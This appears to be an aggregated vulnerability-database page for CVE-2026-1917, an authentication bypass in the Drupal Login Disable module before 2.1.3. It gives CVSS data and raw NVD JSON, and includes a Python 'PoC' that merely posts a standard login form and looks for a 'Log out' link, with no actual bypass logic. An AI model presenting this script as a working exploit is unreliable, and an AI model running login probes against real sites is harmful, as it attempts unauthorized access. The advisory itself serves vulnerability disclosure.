Security Vulnerability Report
中文
CVE-2026-1917 CVSS 4.3 MEDIUM

CVE-2026-1917

Published: 2026-03-25 16:16:10
Last Modified: 2026-04-02 20:37:39

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Login Disable allows Functionality Bypass.This issue affects Login Disable: from 0.0.0 before 2.1.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:budda:login_disable:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal Login Disable < 2.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_vulnerability(target_url, username, password): """ PoC for CVE-2026-1917: Authentication Bypass in Drupal Login Disable. Attempts to login via a direct POST request which might bypass the module's restrictions. """ login_url = f"{target_url}/user/login" # Standard login payload payload = { "name": username, "pass": password, "form_id": "user_login_form", "op": "Log in" } session = requests.Session() try: # Get the login page to establish session and potentially get CSRF token if needed response = session.get(login_url) # Attempt to post login credentials response = session.post(login_url, data=payload) # Check if login was successful by looking for 'Log out' link or checking redirection if response.status_code == 200 and 'Log out' in response.text: print(f"[+] Vulnerability confirmed! Authentication bypassed on {target_url}") return True else: print(f"[-] Authentication bypass failed or patch applied.") return False except Exception as e: print(f"[!] Error occurred: {e}") return False if __name__ == "__main__": target = "http://example.com" # Replace with target URL user = "testuser" pwd = "password" check_vulnerability(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1917", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:10.370", "lastModified": "2026-04-02T20:37:38.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Login Disable allows Functionality Bypass.This issue affects Login Disable: from 0.0.0 before 2.1.3."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autenticación Usando una Ruta o Canal Alternativo en Drupal Login Disable permite la Omisión de Funcionalidad. Este problema afecta a Login Disable: desde 0.0.0 antes de 2.1.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:budda:login_disable:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "2.1.3", "matchCriteriaId": "8B1365FE-349C-46F5-A021-2C6AE029543F"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2026-008", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}